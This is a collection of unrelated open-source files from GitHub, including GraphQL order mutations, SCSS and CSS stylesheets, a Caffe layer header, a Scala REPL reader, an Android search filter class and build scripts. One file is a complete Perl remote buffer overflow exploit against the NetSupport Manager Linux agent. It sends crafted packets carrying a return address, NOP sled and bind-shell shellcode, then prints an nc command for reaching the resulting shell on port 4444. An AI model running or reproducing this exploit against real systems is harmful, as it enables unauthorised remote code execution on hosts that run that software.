...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLinesAddMutation = TypedMutation<
OrderLinesAdd,
OrderLinesAddVariables
>(orderLinesAddMutation);
const orderLineUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLineUpdate($id: ID!, $input: OrderLineInput!) {
draftOrderLineUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLineUpdateMutation = TypedMutation<
OrderLineUpdate,
OrderLineUpdateVariables
>(orderLineUpdateMutation);
const fulfillOrder = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation FulfillOrder($orderId: ID!, $input: OrderFulfillInput!) {
orderFulfill(order: $orderId, input: $input) {
errors: orderErrors {
...OrderErrorFragment
warehouse
orderLine
}
order {
...OrderDetailsFragment
}
}
}
`;
export const useOrderFulfill = makeMutation<
FulfillOrder,
FulfillOrderVariables
>(fulfillOrder);
const invoiceRequestMutation = gql`
${invoiceErrorFragment}
${invoiceFragment}
mutation InvoiceRequest($orderId: ID!) {
invoiceRequest(orderId: $orderId) {
errors: invoiceErrors {
...InvoiceErrorFragment
}
invoice {
...InvoiceFragment
}
order {
id
invoices {
...InvoiceFragment
}
}
}
}
`;
export const TypedInvoiceRequestMutation = TypedMutation<
InvoiceRequest,
InvoiceRequestVariables
>(invoiceRequestMutation);
const invoiceEmailSendMutation = gql`
${invoiceErrorFragment}
${invoiceFragment}
mutation InvoiceEmailSend($id: ID!) {
invoiceSendEmail(id: $id) {
errors: invoiceErrors {
...InvoiceErrorFragment
}
invoice {
...InvoiceFragment
}
}
}
`;
export const TypedInvoiceEmailSendMutation = TypedMutation<
InvoiceEmailSend,
InvoiceEmailSendVariables
>(invoiceEmailSendMutation);
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl
#
# NetSupport Manager Agent Remote Buffer Overflow
# Product details: http://www.netsupportmanager.com/
#
# This vulnerability affects the following software:
#
# [Vulnerable]
# NetSupport Manager for Linux v11.00 and likely all previous
# NetSupport Manager for Solaris v9.50 and likely all previous
# NetSupport Manager for Mac OS X v11.00 and likely all previous
#
# [Not Vulnerable]
# Netsupport Manager for Windows v11.00
#
# [Unknown]
# Netsupport Manager for Windows CE v11.00
# Netsupport Manager for Pocket PC v11.00
# NetSupport Manager for DOS v7.01
# Other products based on the same codebase (e.g. NetSupport School)
#
# This exploit has been tested against:
# - NetSupport Manager Linux agent v10.50.0
# - NetSupport Manager Linux agent v11.0.0
#
# As far as I know, this is still unpatched.
#
# Credit: Luca Carettoni (@_ikki)
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 5405;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') or die "error: $!\n";
print "--[ NetSupport Manager Linux Agent Remote Buffer Overflow ]\n";
print "--[ \@_ikki 2010 ]\n\n";
#my $ret_address = 0x0808bd4f; #jmp esp /usr/nsm/daemon/clientdaemon v10.50.0
my $ret_address = 0x0808c4bf; #jmp esp /usr/nsm/daemon/clientdaemon v11.0.0
my $pad = 976;
my $nop = "\x90" x 50;
# linux/x86/shell_bind_tcp - 217 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# AutoRunScript=, AppendExit=false, PrependChrootBreak=false,
# PrependSetresuid=false, InitialAutoRunScript=,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $shellcode =
"\x89\xe0\xdb\xcb\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x46\x51\x49\x4b\x4c\x37\x4a\x43\x51\x43\x43" .
"\x73\x43\x63\x43\x5a\x44\x42\x4c\x49\x4b\x51\x48\x30\x51" .
"\x76\x4a\x6d\x4d\x50\x43\x6b\x51\x4e\x50\x52\x43\x58\x49" .
"\x6f\x47\x72\x47\x61\x51\x4c\x43\x5a\x42\x30\x42\x71\x46" .
"\x30\x4c\x49\x48\x61\x51\x7a\x45\x36\x46\x38\x48\x4d\x4d" .
"\x50\x4c\x49\x51\x51\x46\x64\x4d\x63\x46\x64\x4c\x70\x45" .
"\x36\x4a\x6d\x4b\x30\x51\x53\x4c\x70\x51\x76\x4a\x6d\x4b" .
"\x30\x4e\x73\x50\x59\x50\x6a\x47\x4f\x46\x38\x4a\x6d\x4b" .
"\x30\x47\x39\x43\x49\x49\x68\x50\x68\x46\x4f\x46\x4f\x42" .
"\x53\x45\x38\x51\x78\x46\x4f\x45\x32\x50\x69\x50\x6e\x4d" .
"\x59\x49\x73\x50\x50\x42\x73\x4b\x39\x49\x71\x4c\x70\x44" .
"\x4b\x48\x4d\x4d\x50\x41\x41";
my $triggerA = "\x15\x00\x5a\x00".("\x41" x 1024)."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $triggerB = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00".
"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00";
my $triggerC = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4".
"\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52".
"\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e". #pleasure trail
("A"x$pad).pack("V", $ret_address).$nop.$shellcode.
"\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32".
"\x30\x00\x31\x30\x00\x00";
my $triggerD = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00".
"\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07".
"\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00".
"\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00";
print "Sending triggers...\n";
$sock->send($triggerA);
sleep 1;
$sock->send($triggerB);
sleep 1;
$sock->send($triggerC);
sleep 1;
$sock->send($triggerD);
sleep 1;
$sock->close;
print "A shell is waiting: \"nc ".$host." 4444\"\n\n"; | {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by lister-gen. DO NOT EDIT.
package v1
| {
"pile_set_name": "Github"
} |
* {
box-sizing: border-box;
}
.clear {
clear: both;
}
.clearfix {
&:before, &:after {
clear: both;
display: table;
content: "";
}
}
.xcode .hide-in-xcode {
display: none;
}
body {
font: 62.5% $body-font;
background: $body-background;
@media (max-width: $mobile-max-width) {
background-color: $content-background;
}
}
h1, h2, h3 {
font-weight: 300;
color: #808080;
}
h1 {
font-size: 2em;
color: #000;
}
h4 {
font-size: 13px;
line-height: 1.5;
margin: 21px 0 0 0;
}
a {
color: $tint-color;
text-decoration: none;
}
pre, code {
font-family: $code-font;
word-wrap: break-word;
}
pre > code, .method-declaration code {
display: inline-block;
font-size: .85em;
padding: 4px 0 4px 10px;
border-left: 5px solid rgba(0, 155, 51, .2);
&:before {
content: "Objective-C";
display: block;
font: 9px/1 $body-font;
color: #009b33;
text-transform: uppercase;
letter-spacing: 2px;
padding-bottom: 6px;
}
}
pre > code {
font-size: inherit;
}
table, th, td {
border: 1px solid #e9e9e9;
}
table {
width: 100%;
}
th, td {
padding: 7px;
> :first-child {
margin-top: 0;
}
> :last-child {
margin-bottom: 0;
}
}
.container {
@extend .clearfix;
max-width: 980px;
padding: 0 10px;
margin: 0 auto;
@media (max-width: $mobile-max-width) {
padding: 0;
}
}
header {
position: fixed;
top: 0;
left: 0;
width: 100%;
z-index: 2;
background: #414141;
color: #fff;
font-size: 1.1em;
line-height: 25px;
letter-spacing: .05em;
#library-title {
float: left;
}
#developer-home {
float: right;
}
h1 {
font-size: inherit;
font-weight: inherit;
margin: 0;
}
p {
margin: 0;
}
h1, a {
color: inherit;
}
@media (max-width: $mobile-max-width) {
.container {
padding: 0 10px;
}
}
}
aside {
position: fixed;
top: 25px;
left: 0;
width: 100%;
height: 25px;
z-index: 2;
font-size: 1.1em;
#header-buttons {
background: rgba(255, 255, 255, .8);
margin: 0 1px;
padding: 0;
list-style: none;
text-align: right;
line-height: 32px;
li {
display: inline-block;
cursor: pointer;
padding: 0 10px;
}
label, select {
cursor: inherit;
}
#on-this-page {
position: relative;
.chevron {
display: inline-block;
width: 14px;
height: 4px;
position: relative;
.chevy {
background: #878787;
height: 2px;
position: absolute;
width: 10px;
&.chevron-left {
left: 0;
transform: rotateZ(45deg) scale(0.6);
}
&.chevron-right {
right: 0;
transform: rotateZ(-45deg) scale(0.6);
}
}
}
#jump-to {
opacity: 0;
font-size: 16px;
position: absolute;
top: 5px;
left: 0;
width: 100%;
height: 100%;
}
}
}
}
article {
margin-top: 25px;
#content {
@extend .clearfix;
background: $content-background;
border: 1px solid $content-border;
padding: 15px 25px 30px 25px;
font-size: 1.4em;
line-height: 1.45;
position: relative;
@media (max-width: $mobile-max-width) {
padding: 15px 10px 20px 10px;
border: none;
}
.navigation-top {
position: absolute;
top: 15px;
right: 25px;
}
.title {
margin: 21px 0 0 0;
padding: 15px 0;
}
p {
color: #414141;
margin: 0 0 15px 0;
}
th, td {
p:last-child {
margin-bottom: 0;
}
}
main {
ul {
list-style: none;
margin-left: 24px;
margin-bottom: 12px;
padding: 0;
li {
position: relative;
padding-left: 1.3em;
&:before {
content: "\02022";
color: #414141;
font-size: 1.08em;
line-height: 1;
position: absolute;
left: 0;
padding-top: 2px;
}
}
}
}
footer {
@extend .clearfix;
.footer-copyright {
margin: 70px 25px 10px 0;
}
p {
font-size: .71em;
color: #a0a0a0;
}
}
}
}
| {
"pile_set_name": "Github"
} |
"""Tests to ensure that the html.parser tree builder generates good
trees."""
from pdb import set_trace
import pickle
from bs4.testing import SoupTest, HTMLTreeBuilderSmokeTest
from bs4.builder import HTMLParserTreeBuilder
class HTMLParserTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
@property
def default_builder(self):
return HTMLParserTreeBuilder()
def test_namespaced_system_doctype(self):
# html.parser can't handle namespaced doctypes, so skip this one.
pass
def test_namespaced_public_doctype(self):
# html.parser can't handle namespaced doctypes, so skip this one.
pass
def test_builder_is_pickled(self):
"""Unlike most tree builders, HTMLParserTreeBuilder and will
be restored after pickling.
"""
tree = self.soup("<a><b>foo</a>")
dumped = pickle.dumps(tree, 2)
loaded = pickle.loads(dumped)
self.assertTrue(isinstance(loaded.builder, type(tree.builder)))
| {
"pile_set_name": "Github"
} |
#ifndef CAFFE_SIGMOID_LAYER_HPP_
#define CAFFE_SIGMOID_LAYER_HPP_
#include <vector>
#include "caffe/blob.hpp"
#include "caffe/layer.hpp"
#include "caffe/proto/caffe.pb.h"
#include "caffe/layers/neuron_layer.hpp"
namespace caffe {
/**
* @brief Sigmoid function non-linearity @f$
* y = (1 + \exp(-x))^{-1}
* @f$, a classic choice in neural networks.
*
* Note that the gradient vanishes as the values move away from 0.
* The ReLULayer is often a better choice for this reason.
*/
template <typename Dtype>
class SigmoidLayer : public NeuronLayer<Dtype> {
public:
explicit SigmoidLayer(const LayerParameter& param)
: NeuronLayer<Dtype>(param) {}
virtual inline const char* type() const { return "Sigmoid"; }
protected:
/**
* @param bottom input Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the inputs @f$ x @f$
* @param top output Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the computed outputs @f$
* y = (1 + \exp(-x))^{-1}
* @f$
*/
virtual void Forward_cpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top);
virtual void Forward_gpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top);
/**
* @brief Computes the error gradient w.r.t. the sigmoid inputs.
*
* @param top output Blob vector (length 1), providing the error gradient with
* respect to the outputs
* -# @f$ (N \times C \times H \times W) @f$
* containing error gradients @f$ \frac{\partial E}{\partial y} @f$
* with respect to computed outputs @f$ y @f$
* @param propagate_down see Layer::Backward.
* @param bottom input Blob vector (length 1)
* -# @f$ (N \times C \times H \times W) @f$
* the inputs @f$ x @f$; Backward fills their diff with
* gradients @f$
* \frac{\partial E}{\partial x}
* = \frac{\partial E}{\partial y} y (1 - y)
* @f$ if propagate_down[0]
*/
virtual void Backward_cpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom);
virtual void Backward_gpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom);
};
} // namespace caffe
#endif // CAFFE_SIGMOID_LAYER_HPP_
| {
"pile_set_name": "Github"
} |
/* NSC -- new Scala compiler
* Copyright 2005-2013 LAMP/EPFL
* @author Stepan Koltsov
*/
package scala.tools.nsc.interpreter.shell
import java.io.IOException
import InteractiveReader._
/** Reads lines from an input stream */
trait InteractiveReader {
def interactive: Boolean
def reset(): Unit
def history: History
def completion: Completion
def redrawLine(): Unit
def readYesOrNo(prompt: String, alt: => Boolean): Boolean = readOneKey(prompt) match {
case 'y' => true
case 'n' => false
case -1 => false // EOF
case _ => alt
}
protected def readOneLine(prompt: String): String
protected def readOneKey(prompt: String): Int
def readLine(prompt: String): String =
// hack necessary for OSX jvm suspension because read calls are not restarted after SIGTSTP
if (scala.util.Properties.isMac) restartSysCalls(readOneLine(prompt), reset())
else readOneLine(prompt)
def initCompletion(completion: Completion): Unit = {}
}
object InteractiveReader {
val msgEINTR = "Interrupted system call"
def restartSysCalls[R](body: => R, reset: => Unit): R =
try body catch {
case e: IOException if e.getMessage == msgEINTR => reset ; body
}
def apply(): InteractiveReader = SimpleReader()
}
/** Collect one line of user input from the supplied reader.
* Runs on a new thread while the REPL is initializing on the main thread.
*
* The user can enter text or a `:paste` command.
*
* TODO: obsolete the whole splash loop by making interpreter always run in separate thread from the UI,
* and communicating with it like we do in the presentation compiler
*/
class SplashLoop(in: InteractiveReader, prompt: String) extends Runnable {
import java.lang.System.{lineSeparator => EOL}
import java.util.concurrent.SynchronousQueue
private val result = new SynchronousQueue[Option[String]]
@volatile private var running: Boolean = _
private var thread: Thread = _
/** Read one line of input which can be retrieved with `line`. */
def run(): Unit = {
var input = ""
try
while (input != null && input.isEmpty && running) {
input = in.readLine(prompt)
if (input != null) {
val trimmed = input.trim
if (trimmed.length >= 3 && ":paste".startsWith(trimmed))
input = readPastedLines
}
}
finally {
try result.put(Option(input))
catch { case ie: InterruptedException => } // we may have been interrupted because the interpreter reported an error
}
}
/** Process `:paste`d input. */
private def readPastedLines: String = {
// while collecting lines, check running flag
var help = f"// Entering paste mode (ctrl-D to finish)%n%n"
val text =
try
Iterator continually in.readLine(help) takeWhile { x =>
help = ""
x != null && running
} mkString EOL trim
catch { case ie: InterruptedException => "" } // TODO let the exception bubble up, or at least signal the interrupt happened?
val next =
if (text.isEmpty) "// Nothing pasted, nothing gained."
else "// Exiting paste mode, now interpreting."
Console println f"%n${next}%n"
text
}
def start(): Unit = result.synchronized {
require(thread == null, "Already started")
thread = new Thread(this)
running = true
thread.start()
}
def stop(): Unit = result.synchronized {
running = false
if (thread != null) thread.interrupt()
thread = null
}
/** Blocking. Returns Some(input) when received during splash loop, or None if interrupted (e.g., ctrl-D). */
def line: Option[String] = result.take
}
object SplashLoop {
def readLine(in: InteractiveReader, prompt: String)(body: => Unit): Option[String] = {
val splash = new SplashLoop(in, prompt)
try { splash.start; body ; splash.line }
catch { case ie: InterruptedException => Some(null) }
finally splash.stop()
}
}
| {
"pile_set_name": "Github"
} |
@import 'nib/clearfix'
support-for-ie = true
#clearfix
clearfix()
| {
"pile_set_name": "Github"
} |
/*=====================================================================
QGroundControl Open Source Ground Control Station
(c) 2009, 2010 QGROUNDCONTROL PROJECT <http://www.qgroundcontrol.org>
This file is part of the QGROUNDCONTROL project
QGROUNDCONTROL is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QGROUNDCONTROL is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QGROUNDCONTROL. If not, see <http://www.gnu.org/licenses/>.
======================================================================*/
/**
* @file
* @brief Implementation of class WatchdogControl
* @author Lorenz Meier <[email protected]>
*
*/
#include "WatchdogProcessView.h"
#include "ui_WatchdogProcessView.h"
WatchdogProcessView::WatchdogProcessView(int processid, QWidget *parent) :
QWidget(parent),
processid(processid),
m_ui(new Ui::WatchdogProcessView)
{
m_ui->setupUi(this);
}
WatchdogProcessView::~WatchdogProcessView()
{
delete m_ui;
}
void WatchdogProcessView::changeEvent(QEvent *e)
{
QWidget::changeEvent(e);
switch (e->type()) {
case QEvent::LanguageChange:
m_ui->retranslateUi(this);
break;
default:
break;
}
}
| {
"pile_set_name": "Github"
} |
json.title notification.notification_type
json.description t('.your_reservation_slot_was_successfully_changed')
| {
"pile_set_name": "Github"
} |
{% extends "email/form_response.html" %}
{% block main %}
{{ block.super }}
{% endblock %}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
"""Helps to keep BUILD.gn files in sync with the corresponding CMakeLists.txt.
For each BUILD.gn file in the tree, checks if the list of cpp files in
it is identical to the list of cpp files in the corresponding CMakeLists.txt
file, and prints the difference if not.
Also checks that each CMakeLists.txt file below unittests/ folders that define
binaries have corresponding BUILD.gn files.
"""
from __future__ import print_function
import os
import re
import subprocess
def sync_source_lists():
# Use shell=True on Windows in case git is a bat file.
gn_files = subprocess.check_output(['git', 'ls-files', '*BUILD.gn'],
shell=os.name == 'nt').splitlines()
# Matches e.g. | "foo.cpp",|, captures |foo| in group 1.
gn_cpp_re = re.compile(r'^\s*"([^"]+\.(?:cpp|c|h|S))",$', re.MULTILINE)
# Matches e.g. | foo.cpp|, captures |foo| in group 1.
cmake_cpp_re = re.compile(r'^\s*([A-Za-z_0-9./-]+\.(?:cpp|c|h|S))$',
re.MULTILINE)
for gn_file in gn_files:
# The CMakeLists.txt for llvm/utils/gn/secondary/foo/BUILD.gn is
# directly at foo/CMakeLists.txt.
strip_prefix = 'llvm/utils/gn/secondary/'
if not gn_file.startswith(strip_prefix):
continue
cmake_file = os.path.join(
os.path.dirname(gn_file[len(strip_prefix):]), 'CMakeLists.txt')
if not os.path.exists(cmake_file):
continue
def get_sources(source_re, text):
return set([m.group(1) for m in source_re.finditer(text)])
gn_cpp = get_sources(gn_cpp_re, open(gn_file).read())
cmake_cpp = get_sources(cmake_cpp_re, open(cmake_file).read())
if gn_cpp == cmake_cpp:
continue
print(gn_file)
add = cmake_cpp - gn_cpp
if add:
print('add:\n' + '\n'.join(' "%s",' % a for a in add))
remove = gn_cpp - cmake_cpp
if remove:
print('remove:\n' + '\n'.join(remove))
print()
def sync_unittests():
# Matches e.g. |add_llvm_unittest_with_input_files|.
unittest_re = re.compile(r'^add_\S+_unittest', re.MULTILINE)
checked = [ 'clang', 'clang-tools-extra', 'lld', 'llvm' ]
for c in checked:
for root, _, _ in os.walk(os.path.join(c, 'unittests')):
cmake_file = os.path.join(root, 'CMakeLists.txt')
if not os.path.exists(cmake_file):
continue
if not unittest_re.search(open(cmake_file).read()):
continue # Skip CMake files that just add subdirectories.
gn_file = os.path.join('llvm/utils/gn/secondary', root, 'BUILD.gn')
if not os.path.exists(gn_file):
print('missing GN file %s for unittest CMake file %s' %
(gn_file, cmake_file))
def main():
sync_source_lists()
sync_unittests()
if __name__ == '__main__':
main()
| {
"pile_set_name": "Github"
} |
6
4
6
19
4
5
4
8
9
52
9
14
60
18
9
6
8
17
25
6
6
9
8
8
17
98
7
8
15
57
5
8
15
51
11
12
12
9
12
20
26
18
12
9
8
9
8
7
6
12
2
69
77
13
10
9
7
85
17
9
7
20
10
6
10
19
18
55
22
10
11
15
21
13
7
61
7
7
15
6
10
7
64
9
8
9
9
13
5
11
13
5
10
25
17
12
12
88
27
8
11
10
6
11
48
11
13
93
8
17
13
69
25
17
43
10
8
11
6
9
12
6
6
47
12
6
13
14
19
8
13
9
14
13
11
13
6
15
84
9
71
11
7
11
17
56
21
10
15
17
13
66
13
10
17
9
2
8
10
13
10
98
12
8
15
12
11
25
10
7
8
46
13
10
11
7
16
31
56
32
39
34
14
9
17
16
82
7
39
58
30
5
17
12
8
16
5
4
98
13
10
48
11
7
11
7
9
13
14
7
8
54
10
20
2
15
19
8
5
5
23
8
10
10
12
8
63
29
9
13
11
46
31
41
5
75
12
63
15
6
17
2
30
4
6
54
5
7
49
5
5
5
7
5
8
7
13
6
57
5
7
7
9
7
7
26
4
5
21
5
15
41
15
15
4
8
55
5
11
59
5
81
47
4
7
20
37
3
| {
"pile_set_name": "Github"
} |
package com.mapswithme.maps.search;
import android.os.Bundle;
import android.view.View;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.annotation.StringRes;
import androidx.core.content.ContextCompat;
import com.mapswithme.maps.R;
import com.mapswithme.maps.widget.SearchToolbarController;
import com.mapswithme.util.UiUtils;
public class SearchFilterController implements SearchToolbarController.FilterParamsChangedListener
{
private static final String STATE_HOTEL_FILTER = "state_hotel_filter";
private static final String STATE_FILTER_PARAMS = "state_filter_params";
private static final String STATE_HOTEL_FILTER_VISIBILITY = "state_hotel_filter_visibility";
@NonNull
private final View mFrame;
@NonNull
private final TextView mShowOnMap;
@NonNull
private final View mFilterButton;
@NonNull
private final ImageView mFilterIcon;
@NonNull
private final TextView mFilterText;
@NonNull
private final View mDivider;
@Nullable
private HotelsFilter mFilter;
@Nullable
private BookingFilterParams mBookingFilterParams;
private boolean mHotelMode;
@NonNull
private final SearchToolbarController mToolbarController;
@NonNull
private final View.OnClickListener mClearListener = new View.OnClickListener()
{
@Override
public void onClick(View v)
{
setFilter(null);
if (mFilterListener != null)
mFilterListener.onFilterClear();
}
};
@Nullable
private final FilterListener mFilterListener;
@Override
public void onBookingParamsChanged()
{
mBookingFilterParams = mToolbarController.getFilterParams();
if (mFilterListener != null)
mFilterListener.onFilterParamsChanged();
}
public boolean isSatisfiedForSearch()
{
return mFilter != null || mBookingFilterParams != null;
}
interface FilterListener
{
void onShowOnMapClick();
void onFilterClick();
void onFilterClear();
void onFilterParamsChanged();
}
SearchFilterController(@NonNull View frame, @Nullable FilterListener listener,
@NonNull SearchToolbarController toolbarController)
{
this(frame, listener, R.string.search_show_on_map, toolbarController);
}
public SearchFilterController(@NonNull View frame, @Nullable FilterListener listener,
@StringRes int populateButtonText,
@NonNull SearchToolbarController toolbarController)
{
mFrame = frame;
mFilterListener = listener;
mToolbarController = toolbarController;
mToolbarController.addBookingParamsChangedListener(this);
mShowOnMap = mFrame.findViewById(R.id.show_on_map);
mShowOnMap.setText(populateButtonText);
mFilterButton = mFrame.findViewById(R.id.filter_button);
mFilterIcon = mFilterButton.findViewById(R.id.filter_icon);
mFilterText = mFilterButton.findViewById(R.id.filter_text);
mDivider = mFrame.findViewById(R.id.divider);
initListeners();
}
public void show(boolean show, boolean showPopulateButton)
{
UiUtils.showIf(show && (showPopulateButton || mHotelMode), mFrame);
showPopulateButton(showPopulateButton);
}
void showPopulateButton(boolean show)
{
UiUtils.showIf(show, mShowOnMap);
}
void showDivider(boolean show)
{
UiUtils.showIf(show, mDivider);
}
public void updateFilterButtonsVisibility(boolean isHotel)
{
mHotelMode = isHotel;
UiUtils.showIf(isHotel, mFilterButton);
mToolbarController.showFilterControls(isHotel);
}
private void initListeners()
{
mShowOnMap.setOnClickListener(v ->
{
if (mFilterListener != null)
mFilterListener.onShowOnMapClick();
});
mFilterButton.setOnClickListener(v ->
{
if (mFilterListener != null)
mFilterListener.onFilterClick();
});
}
@Nullable
public HotelsFilter getFilter()
{
return mFilter;
}
public void setFilterParams(@Nullable BookingFilterParams params)
{
if (params == null)
return;
mToolbarController.setFilterParams(params);
mBookingFilterParams = params;
}
public void setFilter(@Nullable HotelsFilter filter)
{
mFilter = filter;
if (mFilter != null)
{
mFilterIcon.setOnClickListener(mClearListener);
mFilterIcon.setImageResource(R.drawable.ic_cancel);
mFilterIcon.setColorFilter(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.accentButtonTextColor)));
UiUtils.setBackgroundDrawable(mFilterButton, R.attr.accentButtonRoundBackground);
mFilterText.setTextColor(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.accentButtonTextColor)));
}
else
{
mFilterIcon.setOnClickListener(null);
mFilterIcon.setImageResource(R.drawable.ic_filter_list);
mFilterIcon.setColorFilter(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.colorAccent)));
UiUtils.setBackgroundDrawable(mFilterButton, R.attr.clickableBackground);
mFilterText.setTextColor(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.colorAccent)));
}
}
public void resetFilterAndParams()
{
setFilter(null);
resetFilterParams();
updateFilterButtonsVisibility(false);
}
private void resetFilterParams()
{
mToolbarController.resetFilterParams();
mBookingFilterParams = null;
}
@Nullable
public BookingFilterParams getBookingFilterParams()
{
return mBookingFilterParams;
}
public void onSaveState(@NonNull Bundle outState)
{
outState.putParcelable(STATE_HOTEL_FILTER, mFilter);
outState.putParcelable(STATE_FILTER_PARAMS, mBookingFilterParams);
outState.putBoolean(STATE_HOTEL_FILTER_VISIBILITY,
mFilterButton.getVisibility() == View.VISIBLE);
}
public void onRestoreState(@NonNull Bundle state)
{
setFilter(state.getParcelable(STATE_HOTEL_FILTER));
setFilterParams(state.getParcelable(STATE_FILTER_PARAMS));
updateFilterButtonsVisibility(state.getBoolean(STATE_HOTEL_FILTER_VISIBILITY, false));
}
public static class DefaultFilterListener implements FilterListener
{
@Override
public void onShowOnMapClick()
{
}
@Override
public void onFilterClick()
{
}
@Override
public void onFilterClear()
{
}
@Override
public void onFilterParamsChanged()
{
}
}
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Usage:
# ./experiments/scripts/faster_rcnn_alt_opt.sh GPU NET DATASET [options args to {train,test}_net.py]
# DATASET is only pascal_voc for now
#
# Example:
# ./experiments/scripts/faster_rcnn_alt_opt.sh 0 VGG_CNN_M_1024 pascal_voc \
# --set EXP_DIR foobar RNG_SEED 42 TRAIN.SCALES "[400, 500, 600, 700]"
set -x
set -e
export PYTHONUNBUFFERED="True"
GPU_ID=$1
NET=$2
NET_lc=${NET,,}
DATASET=$3
array=( $@ )
len=${#array[@]}
EXTRA_ARGS=${array[@]:3:$len}
EXTRA_ARGS_SLUG=${EXTRA_ARGS// /_}
case $DATASET in
pascal_voc)
TRAIN_IMDB="voc_0712_trainval"
TEST_IMDB="voc_0712_test"
PT_DIR="pascal_voc"
;;
coco)
TRAIN_IMDB="coco_2014_train"
TEST_IMDB="coco_2014_val"
PT_DIR="coco"
ITERS=40000
;;
*)
echo "No dataset given"
exit
;;
esac
LOG="experiments/logs/rfcn_alt_opt_5step_ohem_rpn4_${NET}_${EXTRA_ARGS_SLUG}.txt.`date +'%Y-%m-%d_%H-%M-%S'`"
exec &> >(tee -a "$LOG")
echo Logging output to "$LOG"
time ./tools/train_rfcn_alt_opt_5stage.py --gpu ${GPU_ID} \
--net_name ${NET} \
--weights data/imagenet_models/${NET}-model.caffemodel \
--imdb ${TRAIN_IMDB} \
--imdb_test ${TEST_IMDB} \
--cfg experiments/cfgs/rfcn_alt_opt_5step_ohem.yml \
--model 'rfcn_alt_opt_5step_ohem'
${EXTRA_ARGS}
set +x
NET_FINAL=`grep "Final model" ${LOG} | awk '{print $3}'`
RPN_FINAL=`grep "Final RPN" ${LOG} | awk '{print $3}'`
set -x
time ./tools/test_net.py --gpu ${GPU_ID} \
--def models/${PT_DIR}/${NET}/rfcn_alt_opt_5step_ohem/rfcn_test.pt \
--net ${NET_FINAL} \
--imdb ${TEST_IMDB} \
--rpn_file ${RPN_FINAL} \
--cfg experiments/cfgs/rfcn_alt_opt_5step_ohem.yml \
--num_dets 400
${EXTRA_ARGS}
| {
"pile_set_name": "Github"
} |
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* ColVis styles
*/
div.ColVis {
float: right;
margin-bottom: 1em;
}
button.ColVis_Button,
ul.ColVis_collection li {
position: relative;
float: left;
margin-right: 3px;
padding: 5px 8px;
border: 1px solid #999;
cursor: pointer;
*cursor: hand;
font-size: 0.88em;
color: black !important;
white-space: nowrap;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
-ms-border-radius: 2px;
-o-border-radius: 2px;
border-radius: 2px;
-webkit-box-shadow: 1px 1px 3px #ccc;
-moz-box-shadow: 1px 1px 3px #ccc;
-ms-box-shadow: 1px 1px 3px #ccc;
-o-box-shadow: 1px 1px 3px #ccc;
box-shadow: 1px 1px 3px #ccc;
/* Generated by http://www.colorzilla.com/gradient-editor/ */
background: #ffffff; /* Old browsers */
